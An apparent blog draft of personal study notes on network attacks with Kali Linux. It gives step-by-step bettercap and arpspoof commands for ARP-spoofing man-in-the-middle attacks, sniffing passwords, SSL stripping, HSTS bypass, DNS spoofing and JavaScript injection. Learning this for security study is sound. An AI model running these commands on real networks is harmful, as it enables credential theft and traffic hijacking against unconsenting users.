JackMcKew/jackmckew.dev/drafts/2020/network-hacking-with-kali/network-hacking-with-kali.md

     - There is also a tool called bettercap (more features).
     - ARPspoof is not default installed use `apt-get update && apt-get install -y dsniff`
 - Packets will be blocked by default on linux to allow packets to flow though on linux use `echo 1 > /proc/sys/net/ipv4/ip_forward` (echo 0 to revert)

+##### BetterCap

+- use `bettercap -iface [interface]` (interface must be connected to the network you wish to attack)
+    - use help to get info of modules running or help [module for more]
+- `net.probe on` gets all clients
+- `net.show` shows all clients
+- To do Man in the middle in Bettercap use `help arp.spoof` you need to modify some of the options, to do this use `set [option_name] [value]` (set full.duplux on and set targets in .targets)
+- once settings have been set up turn it on `arp.spoof on`
+- To capture data that is being spoofed and analyse it use the net.sniff module `net.sniff on` , you will see entered usernames and passwords under POST
+- Instead of doing the above you can use a caplet, to capture data for you
+    1. open a text file and type each command
+        - `net.probe on`
+        - `set arp.spoof.fullduplex true`
+        - `set arp.spoof.targets [target_ips]` (will need to change IP in script each time you use, to target multiple IPs use the comma [,] after each IP)
+        - `arp.spoof on`
+        - `net.sniff on`
+    2. Save the file with .cap
+    3. From Bash use `bettercap -iface [interface] -caplet [filename]`

+#### HTTPS

+HTTP is sent as plain text HTTPS adds a extra layer of security called TLS (Transport layer security) or SSL(Secure Socket Layer), they encrypt traffic being sent.
+Almost impossible to break, therefore easiest method is to downgrade the connection to HTTP can use a tool called `SSL Strip`.
+BetterCap has a caplet for this however it does not replace all HTTPS links in the loaded pages.
+This won't work if the target site has implemented HSTS, this can also be bypassed but is more difficult (by tricking the browser into loading a different site).
+One method is to use `hstshijack`, which a resource for this is at <https://github.com/bettercap/caplets/tree/master/hstshijack>.

+#### DNS Spoofing

+Instead of returning Google's IP return a malicious server.
+Kali comes installed with a webserver, to start it use `service apache2 start` go to KALI's IP to use.
+The default webpage is stored in /var/www/html.

+To spoof:

+1. Start bettercap with the caplet coded above
+2. Use the dns.spoof module:
+    1. if you do not want to redirect to yourself change the dns.spoof.address value
+    2. set dns.spoof.all so bettercap responds to any dns request `set dns.spoof.all true`
+    3. set dns.spoof.domains to the sites you wish to be redirected to you. `set dns.spoof.domains [domain1, domain2]` (use \* as a wildcard to do any subdoamin under a website eg.*.kali.org)
+    4. start dns.spoof `dns.spoof on`

+How to insert javascript code:

+1. Have javascript code file
+2. go to the hstshijack plugin /usr/share/bettercap/caplets
+3. go to the .cap file and add the js code under the payloads, \* means all domains then : eg. *:/code.js (otherwise use a domain).